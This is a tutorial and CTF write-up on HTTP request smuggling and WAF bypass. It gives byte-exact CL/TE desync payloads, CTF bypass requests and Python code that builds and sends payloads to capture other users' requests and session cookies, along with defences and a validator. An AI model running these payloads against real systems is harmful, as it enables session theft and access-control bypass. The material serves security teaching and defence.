Analyzing HTTP Request Smuggling and WAF Bypass through CTF Challenges
Word count: 934 | 2025-08-06 18:07:37
HTTP Request Smuggling and WAF Bypass Techniques Explained
0x00 Basic Concepts
HTTP request smuggling (HTTP Request Smuggling) is a vulnerability that exploits differences in how a front-end server (a reverse proxy, load balancer or WAF) and a back-end server parse the same HTTP request. By crafting a request whose boundaries the two servers disagree on, an attacker slips a second request past the front-end's security controls (authentication, WAF rules, path restrictions) straight to the back-end, and can also interfere with other users' requests that share the same back-end connection.
Key prerequisites
- Keep-Alive: the HTTP/1.1 default; the TCP connection stays open and is reused for several requests. It is the reused front-end to back-end connection that makes smuggling possible: any bytes the back-end does not consume as part of the current request are treated as the start of the next one.
- Pipelining: a client may send several requests back to back without waiting for the responses, so the server must rely entirely on the framing headers to find where each request ends.
0x01 Root Cause
The vulnerability arises when the two servers disagree about where a request body ends, because they handle the two body-framing headers inconsistently:
- Content-Length (CL): states the body length in bytes.
- Transfer-Encoding (TE): states the transfer coding, in particular chunked, where the body is a sequence of chunks, each prefixed by its hexadecimal length, ended by a zero-length chunk.
RFC 7230 says that when both headers are present Transfer-Encoding takes precedence and Content-Length must be ignored (a message like that is itself a smuggling indicator and ought to be rejected). Servers that do not follow this, that only recognise one of the two headers, or that can be tricked into not recognising one, are the ones that can be desynchronised.
0x02 Common Smuggling Variants
1. CL not 0 (GET with a body)
Scenario: the front-end honours Content-Length on a GET request, the back-end does not.
GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 42\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: example.com\r\n
\r\n
The front-end reads the 42-byte body and forwards everything as one request; the back-end ignores the body of a GET, so the same 42 bytes are parsed as a second request for /admin that never went through the front-end's access control.

2. CL CL
Scenario: the request carries two Content-Length headers; the front-end uses the first, the back-end the second.
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n
\r\n
12345\r\n
a
The front-end forwards all 8 body bytes ("12345\r\na"); the back-end consumes only 7, so the trailing "a" stays in its buffer and is prepended to the next request on that connection (a following GET becomes "aGET"). Most servers now reject duplicate Content-Length headers, so this variant is rare.

3. CL TE
Scenario: the front-end uses Content-Length, the back-end uses Transfer-Encoding.
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 10\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
A\r\n
\r\n
The front-end forwards the whole 10-byte body; the back-end decodes it as chunked, hits the terminating zero-length chunk after 5 bytes, and keeps the remaining "A\r\n\r\n" as the beginning of the next request.

4. TE CL
Scenario: the front-end uses Transfer-Encoding, the back-end uses Content-Length.
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\r\n
\r\n
12\r\n
WPOST / HTTP/1.1\r\n
\r\n
0\r\n
\r\n
The front-end decodes one chunk of 0x12 = 18 bytes ("WPOST / HTTP/1.1\r\n") followed by the terminating chunk and forwards everything; the back-end reads only 4 body bytes ("12\r\n") and parses "WPOST / HTTP/1.1" as a new request.

5. TE TE
Scenario: both servers support Transfer-Encoding, but one of them can be made to ignore it by obfuscating the header (here a second Transfer-Encoding: cow), so that it falls back to Content-Length.
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\r\n
Transfer-Encoding: cow\r\n
\r\n
5c\r\n
WPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n
Here the front-end honours the first Transfer-Encoding and decodes the 0x5c = 92-byte chunk; the back-end takes the last one, does not recognise "cow", falls back to Content-Length: 4 and reads only "5c\r\n". The rest becomes a smuggled POST whose own Content-Length: 15 exceeds the 10 bytes that follow it ("x=1\r\n0\r\n\r\n"), so the back-end keeps waiting and appends the first 5 bytes of the next user's request to that body. If the roles are reversed (front-end falls back to CL, back-end honours chunked) the same trick yields a CL.TE desync. Other obfuscations that work against some servers: "Transfer-Encoding: xchunked", "Transfer-Encoding : chunked" (space before the colon), a folded continuation line (" Transfer-Encoding: x"), and "chunked" followed by a tab.

In every variant the Content-Length values and chunk sizes must be byte-exact, including the CRLF pairs. When testing from Burp Repeater, disable the "Update Content-Length" option, otherwise the tool silently corrects the outer header and the desync disappears.
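To see the disagreement concretely, here is a small Python framer, added to this article and not part of the original post, that can be configured to behave like either side of each variant above. It frames the same bytes under two policies and reports what each side considers a complete request and what it keeps buffered. The payloads are the CL.TE, TE.CL and TE.TE requests above written out as exact bytes; the policy names and the constructed victim request (GET /victim) are illustrative assumptions.

```python
# Added example, not code from the original article: a minimal HTTP/1.1 request framer
# whose Policy reproduces the CL/TE disagreements described above.
from dataclasses import dataclass, field


@dataclass
class Policy:
    """Framing rules a server applies. Real front-ends and back-ends differ exactly here."""
    name: str
    prefer_te: bool = True      # when both headers are present, honour Transfer-Encoding
    te_pick: str = "first"      # which Transfer-Encoding header wins if several ("first"/"last")
    cl_pick: str = "first"      # which Content-Length header wins if several ("first"/"last")
    get_has_body: bool = True   # honour Content-Length on a GET request


@dataclass
class Request:
    method: str
    target: str
    headers: list = field(default_factory=list)
    body: bytes = b""


def read_chunked(buf):
    """Decode a chunked body. Returns (body, remaining_bytes, complete)."""
    body = b""
    while True:
        eol = buf.find(b"\r\n")
        if eol < 0:
            return body, buf, False
        size = int(buf[:eol].split(b";")[0], 16)   # chunk-size in hex, chunk extensions ignored
        start = eol + 2
        if size == 0:                              # last-chunk, followed by the empty line ending the body
            end = buf.find(b"\r\n", start)
            return (body, buf[end + 2:], True) if end >= 0 else (body, buf, False)
        if len(buf) < start + size + 2:
            return body, buf, False
        body += buf[start:start + size]
        buf = buf[start + size + 2:]               # skip chunk-data and its trailing CRLF


def frame(raw, pol):
    """Split raw bytes into the requests this policy sees. Returns (requests, bytes_still_buffered)."""
    reqs, buf = [], raw
    while True:
        end = buf.find(b"\r\n\r\n")
        if end < 0:
            return reqs, buf                       # no complete header block yet
        lines = buf[:end].split(b"\r\n")
        parts = lines[0].decode("latin-1").split(" ")
        if len(parts) != 3:
            return reqs, buf                       # not a request-line: a real server would answer 400
        headers = []
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers.append((name.strip().lower().decode("latin-1"), value.strip().decode("latin-1")))
        rest = buf[end + 4:]
        tes = [v for n, v in headers if n == "transfer-encoding"]
        cls = [v for n, v in headers if n == "content-length"]
        te = (tes[0] if pol.te_pick == "first" else tes[-1]) if tes else None
        if te is not None and (pol.prefer_te or not cls) and te.lower() == "chunked":
            body, rest, complete = read_chunked(rest)
        elif cls and (parts[0] != "GET" or pol.get_has_body):
            n = int(cls[0] if pol.cl_pick == "first" else cls[-1])
            body, complete, rest = rest[:n], len(rest) >= n, rest[n:]
        else:
            body, complete = b"", True             # no usable framing header: empty body
        if not complete:
            return reqs, buf                       # server keeps waiting for the rest of this body
        reqs.append(Request(parts[0], parts[1], headers, body))
        buf = rest


# Policies modelling the two sides of each desync (names are illustrative).
CL_FIRST = Policy("uses Content-Length", prefer_te=False)
TE_FIRST = Policy("uses Transfer-Encoding", prefer_te=True)
TE_LAST = Policy("takes the last Transfer-Encoding header", te_pick="last")

# The article's payloads as the exact bytes on the wire.
CL_TE = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nA\r\n\r\n")
TE_CL = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 4\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n12\r\nWPOST / HTTP/1.1\r\n\r\n0\r\n\r\n")
TE_TE = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 4\r\n"
         b"Transfer-Encoding: chunked\r\nTransfer-Encoding: cow\r\n\r\n5c\r\n"
         b"WPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n")
VICTIM = b"GET /victim HTTP/1.1\r\nHost: example.com\r\n\r\n"   # constructed: the next user's request


def compare(raw, front, back):
    """Summarise what each side makes of the same bytes."""
    f_reqs, f_left = frame(raw, front)
    b_reqs, b_left = frame(raw, back)
    return {"front": [(r.method, r.target, r.body) for r in f_reqs], "front_left": f_left,
            "back": [(r.method, r.target, r.body) for r in b_reqs], "back_left": b_left}


if __name__ == "__main__":
    for label, raw, front, back in [("CL.TE", CL_TE, CL_FIRST, TE_FIRST),
                                    ("TE.CL", TE_CL, TE_FIRST, CL_FIRST),
                                    ("TE.TE", TE_TE + VICTIM, TE_FIRST, TE_LAST)]:
        print(label, compare(raw, front, back))
```

For TE.TE the run shows the point of the oversized inner Content-Length: the back-end's second request (WPOST) ends with "GET /", the first five bytes of the victim's request, and the mangled remainder "victim HTTP/1.1..." is what the victim's request has become. The same framer, with `cl_pick` or `get_has_body` varied, reproduces the CL.CL and GET-with-body variants.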
0x03 Practical Attack Scenarios
1. Capturing other users' requests
Send a CL.TE request that leaves a partial POST to a comment endpoint in the back-end's buffer; the next user's request is appended to its body and ends up stored as a comment the attacker can read:
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 333\r\n
Transfer-Encoding: chunked\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
0\r\n
\r\n
POST /post/comment HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 700\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
csrf=xxx&postId=6&comment=spring
Two lengths matter. The outer Content-Length must equal the exact number of bytes after the first blank line (the 333 shown does not match the abbreviated payload printed here; recount it for your own payload). The smuggled Content-Length: 700 is deliberately larger than the bytes that follow it, so the back-end appends up to 700 bytes of the victim's request (request line, headers, cookies) to the comment parameter. Too large a value and the back-end times out waiting for bytes that never come; too small and the victim's session cookie is cut off. The smuggled request also needs whatever session cookie and CSRF token the comment form normally requires (csrf=xxx is a placeholder).

2. Leaking request headers for unauthorised access
The same CL.TE shape, but the smuggled request targets an endpoint that reflects a parameter (here search) back in the response. Whatever the front-end appends to the following request, for example an internal client-IP or authentication header it adds before forwarding, is swallowed into the search value and echoed back:
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 77\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST / HTTP/1.1\r\n
Content-Length: 70\r\n
Connection: close\r\n
\r\n
search=111
Again the smuggled Content-Length: 70 is intentionally larger than the 10-byte body, so the back-end appends the start of the next request, including the headers the front-end added, to search=111. Once the name of the internal header is known, a later smuggled request can simply include it with a chosen value and bypass the front-end's authorisation check.
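Both payloads above depend on an outer Content-Length that matches the bytes actually sent and an inner Content-Length that overshoots by a chosen amount. The Python helper below, added here and not part of the original article, builds both CL.TE payloads with those lengths computed rather than hand-counted, and delivers the exact bytes over a raw socket, since an HTTP client library would recompute or strip the framing headers. example.com, the placeholder cookie and the extra byte counts are assumptions for illustration.

```python
# Added example, not code from the original article: build CL.TE payloads with computed
# lengths and send them as raw bytes. Hosts, cookie and byte counts are placeholders.
import socket
import ssl


def smuggled_request(method, path, host, body, extra=0, headers=()):
    """Build the inner request. Its Content-Length is len(body) + extra: the surplus makes
    the back-end append the first `extra` bytes of the next request to this body."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}",
             f"Content-Length: {len(body) + extra}",
             "Content-Type: application/x-www-form-urlencoded", *headers]
    return "\r\n".join(lines).encode() + b"\r\n\r\n" + body


def cl_te_wrapper(host, inner, path="/"):
    """Wrap `inner` in a CL.TE request: the chunked body ends at once (zero-length chunk) and
    the outer Content-Length covers that chunk plus all of `inner`, so a CL-honouring
    front-end forwards everything while a TE-honouring back-end parses `inner` as a new request."""
    body = b"0\r\n\r\n" + inner
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Length: {len(body)}\r\nTransfer-Encoding: chunked\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
    return head.encode() + body


def outer_content_length(payload):
    """Self-check: return (declared outer Content-Length, actual body size)."""
    head, _, body = payload.partition(b"\r\n\r\n")
    declared = [line.split(b":", 1)[1].strip() for line in head.split(b"\r\n")
                if line.lower().startswith(b"content-length:")]
    return int(declared[0]), len(body)


def send_raw(host, port, payload, use_tls=False, timeout=10):
    """Deliver the exact bytes and return whatever the server sends back (not run offline)."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    chunks = []
    with sock:
        sock.sendall(payload)
        try:
            while data := sock.recv(65536):
                chunks.append(data)
        except socket.timeout:
            pass   # keep-alive server: return what arrived before the timeout
    return b"".join(chunks)


# Scenario 1: the captured request lands in the comment parameter; extra=700 as in the article.
CAPTURE = cl_te_wrapper("example.com", smuggled_request(
    "POST", "/post/comment", "example.com", b"csrf=xxx&postId=6&comment=", extra=700,
    headers=("Cookie: session=ATTACKER_SESSION",)))   # placeholder cookie and csrf token
# Scenario 2: 10-byte body plus extra=60 gives the article's Content-Length: 70.
REVEAL = cl_te_wrapper("example.com", smuggled_request(
    "POST", "/", "example.com", b"search=111", extra=60, headers=("Connection: close",)))

if __name__ == "__main__":
    for payload in (CAPTURE, REVEAL):
        print(outer_content_length(payload), payload[:100])
    # send_raw("example.com", 80, CAPTURE)   # then fetch the post normally to read the captured request
```

Send the payload, then issue an ordinary request on a new connection: for scenario 1 the comment now contains the victim's request, for scenario 2 the search response echoes the front-end's rewritten headers. Increase `extra` step by step until the interesting header is included, but stop before the back-end starts timing out.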
0x04 CTF Case Studies
Case 1: GKCTF2021 hackme
The front-end is Nginx earlier than 1.17.7, which is vulnerable to request smuggling when an error_page is configured (CVE-2019-20372); behind it sits a WebLogic server whose /console path is blocked at the proxy. The request below carries a second request after its headers, and that second request reaches WebLogic on the proxy's back-end connection:
GET /test HTTP/1.1\r\n
Host: target.com\r\n
Content-Length: 0\r\n
Transfer-Encoding: chunked\r\n
\r\n
GET /console/login/LoginForm.jsp HTTP/1.1\r\n
Host: weblogic\r\n
\r\n
The response to the second request is the WebLogic console login page, confirming the proxy's path restriction has been bypassed.

Case 2: RCTF2019 easy calc
calc.php evaluates the num parameter, and a WAF in front of it blacklists characters in num. Two bypasses:
Conventional WAF bypass: put a space before the parameter name. The WAF looks for a parameter literally named num and finds none, while PHP strips the leading space and still populates $_GET['num']; the path is assembled with chr() so that no quotes or slashes appear in the URL:
calc.php? num=readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103) spells /f1agg.)
Smuggling bypass: send the payload as a CL.CL request so that the WAF and PHP frame the body differently:
POST /calc.php HTTP/1.1\r\n
Host: target.com\r\n
Content-Length: 50\r\n
Content-Length: 49\r\n
\r\n
num=readfile("/f1agg");//
As with every CL.CL request, both values must correspond to the bytes actually transmitted (the body printed here is 25 bytes, so the pair shown needs padding or recounting); a front-end waiting for bytes that never arrive simply times out.

Case 3: ISCC2022 让我康康! ("Let me see!")
Gunicorn before 20.0.4 still implements the obsolete draft-76 WebSocket handshake: if a request carries a Sec-Websocket-Key1 header, Gunicorn reads exactly 8 body bytes regardless of Content-Length. The front-end forwards the full body, so everything after the first 8 "x" bytes is parsed by Gunicorn as a second request, one that carries the secr3t_ip: 127.0.0.1 header the application trusts for access control:
POST / HTTP/1.1\r\n
Host: target.com\r\n
Content-Length: 149\r\n
Sec-Websocket-Key1: x\r\n
\r\n
xxxxxxxxPOST / HTTP/1.1\r\n
Host: 127.0.0.1\r\n
secr3t_ip: 127.0.0.1\r\n
Content-Length: 150\r\n
\r\n
search=abc
POST / HTTP/1.1\r\n
Content-Length: 14\r\n
\r\n
search=111
The smuggled request's Content-Length: 150 exceeds the bytes that follow it, so Gunicorn holds that request until a later request on the same connection supplies the missing bytes; the trailing POST / with search=111 is that follow-up, and the response it gets is the one served with secr3t_ip honoured.
0x05 Defences
- Disable reuse of the TCP connection between the front-end and the back-end (one back-end connection per client request), so leftover bytes cannot bleed into another user's request.
- Normalise every request on the front-end before forwarding: exactly one canonical Content-Length or Transfer-Encoding, no duplicate or malformed framing headers.
- Have the front-end reject ambiguous requests outright (both CL and TE present, duplicate Content-Length headers, a Transfer-Encoding other than plain chunked, obfuscated header names, a body on GET) instead of guessing.
- Use the same HTTP parser, or at least identical framing rules, on every hop, or speak HTTP/2 end to end so that there are no CL/TE headers to disagree about.
- Keep the back-end off the internet so it is reachable only through the hardened front-end; this does not prevent smuggling by itself, but it limits what an attacker can reach directly.
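The third recommendation, rejecting ambiguous requests, can be written down as a small validator. The Python check below is an added example, not code from the article or from any particular proxy; it inspects only the header block and returns the reason for rejection. The samples are constructed header blocks mirroring the variants from 0x02 plus the common Transfer-Encoding obfuscations, and the policy is deliberately strict (only a single, exact "chunked" value is accepted).

```python
# Added example, not code from the original article: strict front-end framing check.
import re

_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")   # RFC 7230 tchar: no spaces, no tabs


def parse_head(raw):
    """Return (request_line, [(name, ':' or '', raw_value), ...]) from a raw header block."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    return lines[0], [line.partition(":") for line in lines[1:]]


def ambiguity(raw):
    """Return why the request must be rejected as ambiguous, or None if its framing is clean."""
    request_line, headers = parse_head(raw)
    method = request_line.split(" ")[0]
    cls, tes = [], []
    for name, sep, value in headers:
        if not sep or not _TOKEN.match(name):
            # covers 'Transfer-Encoding : chunked' (space before colon) and folded ' Transfer-Encoding: x'
            return f"malformed header line: {name!r}"
        key = name.lower()
        if key == "content-length":
            cls.append(value.strip(" "))
        elif key == "transfer-encoding":
            tes.append(value.strip(" "))          # strip spaces only, so a trailing tab still shows
    if cls and tes:
        return "both Content-Length and Transfer-Encoding present"
    if len(cls) > 1:
        return "duplicate Content-Length"          # reject even when the values agree
    if cls and not re.fullmatch(r"[0-9]+", cls[0]):
        return "non-numeric Content-Length"
    if len(tes) > 1 or (tes and tes[0] != "chunked"):
        return f"unexpected Transfer-Encoding {tes!r}"   # 'cow', 'xchunked', 'chunked\t', two TE headers
    if method in ("GET", "HEAD") and cls and cls[0] != "0":
        return "body on a GET/HEAD request"
    return None


SAMPLES = {   # constructed header blocks: the article's variants plus a clean request
    "clean": b"POST / HTTP/1.1\r\nHost: a\r\nContent-Length: 3\r\n\r\n",
    "get_body": b"GET / HTTP/1.1\r\nHost: a\r\nContent-Length: 42\r\n\r\n",
    "cl_cl": b"POST / HTTP/1.1\r\nHost: a\r\nContent-Length: 8\r\nContent-Length: 7\r\n\r\n",
    "cl_te": b"POST / HTTP/1.1\r\nHost: a\r\nContent-Length: 10\r\nTransfer-Encoding: chunked\r\n\r\n",
    "te_te": b"POST / HTTP/1.1\r\nHost: a\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: cow\r\n\r\n",
    "space_colon": b"POST / HTTP/1.1\r\nHost: a\r\nTransfer-Encoding : chunked\r\n\r\n",
    "folded": b"POST / HTTP/1.1\r\nHost: a\r\nTransfer-Encoding: chunked\r\n Transfer-Encoding: x\r\n\r\n",
    "tab": b"POST / HTTP/1.1\r\nHost: a\r\nTransfer-Encoding: chunked\t\r\n\r\n",
}


def audit(samples=SAMPLES):
    """Run the check over every sample and map its name to the rejection reason (None = accepted)."""
    return {name: ambiguity(block) for name, block in samples.items()}


if __name__ == "__main__":
    for name, reason in audit().items():
        print(f"{name:12} -> {reason or 'accepted'}")
```

Only the clean request passes; every smuggling shape from 0x02 is rejected before it is forwarded. A real front-end would answer 400 and close the connection, so that no bytes of the rejected request linger for the next one.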